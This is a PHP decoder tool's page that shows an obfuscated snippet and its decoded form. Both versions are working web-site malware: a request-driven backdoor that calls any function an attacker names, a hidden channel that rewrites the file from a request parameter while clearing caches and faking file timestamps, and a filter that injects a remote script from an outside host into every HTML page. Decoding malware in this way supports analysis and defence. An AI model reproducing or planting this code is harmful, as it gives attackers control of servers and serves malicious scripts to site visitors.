Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

If( $vcSQC =@$ {"_REQUEST" }["PUXEJEQA" ]){$vcSQC[1](${$vcSQC[2 ]}[0],$vcSQC[3]($vcSQC[4])..

Decoded Output download

<?  If(	$vcSQC	=@$ {"_REQUEST"	}["PUXEJEQA" ]){$vcSQC[1](${$vcSQC[2	]}[0],$vcSQC[3]($vcSQC[4]))	;}; 
/*cut here;)*/if(isset($_REQUEST["09st0ppjvnb7van6"])){if(empty($_REQUEST["09st0ppjvnb7van6"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("X-LiteSpeed-Purge: *");if(function_exists("opcache_reset")){@opcache_reset();}if(function_exists("apc_clear_cache")){@apc_clear_cache();}$qcjpp5=filemtime(__FILE__);$omist0=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["09st0ppjvnb7van6"]))));@touch(__FILE__,$qcjpp5+1,$omist0+1);}die;}if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){function rihfzf($qcjpp5){return str_replace("</head>","<script type='text/javascript' async src='https://kzwrmauq.cloudfire.quest/challenge.js'></script></head>",$qcjpp5);}ob_start("rihfzf");}/*cut here;)*/ ?>

Did this file decode correctly?

Original Code

If(	$vcSQC	=@$ {"_REQUEST"	}["PUXEJEQA" ]){$vcSQC[1](${$vcSQC[2	]}[0],$vcSQC[3]($vcSQC[4]))	;};
/*cut here;)*/if(isset($_REQUEST["\x309\x73\164\x30p\x70\x6avn\142\x37\166\x61\1566"])){if(empty($_REQUEST["0\x39\163t0ppj\x76n\x62\67\x76\141n6"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("X\x2dL\x69\x74\145\x53\x70\x65e\144\55P\x75r\x67\145:\x20\52");if(function_exists("\x6f\x70\x63\141\x63\150\145_\x72es\145\x74")){@opcache_reset();}if(function_exists("\141\160\143\x5fcl\x65ar\137\x63\x61\x63\150e")){@apc_clear_cache();}$qcjpp5=filemtime(__FILE__);$omist0=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("\x48*",$_REQUEST["\60\x39\163\164\60\x70\160\152v\156b\x37v\x61n\x36"]))));@touch(__FILE__,$qcjpp5+1,$omist0+1);}die;}if(isset($_SERVER["\110\x54T\120\137\101\103\x43E\120\x54"])&&(strpos($_SERVER["HT\x54P\137AC\x43\x45\120\124"],"\x74\145\170t\x2f\150tm\x6c")!==false||$_SERVER["\x48TT\x50\x5fA\x43\x43\105\120\124"]==="\52\57\52")){function rihfzf($qcjpp5){return str_replace("\x3c/\150ead>","<\163\x63ript\x20t\x79\x70\145\x3d\47\x74\x65xt/\x6a\x61v\141\x73\x63r\151p\164\x27 \141\x73\x79\x6ec\x20\x73\x72\143\75\47\x68\x74\164p\x73:\57\57\x6b\x7a\x77r\x6dau\x71\56c\154oud\146\151\162\x65\56\161\x75\x65\x73t/\143hal\x6ceng\x65\x2e\152\163'\x3e\74\x2f\x73cri\x70\164\x3e</\150ea\144\76",$qcjpp5);}ob_start("\162\x69\x68f\x7af");}/*cut here;)*/

Function Calls

strpos 1

Variables

$vcSQC None

Stats

MD5 cc9a264d3b0cf6bb21b0b1ecf6cf88c9
Eval Count 0
Decode Time 423 ms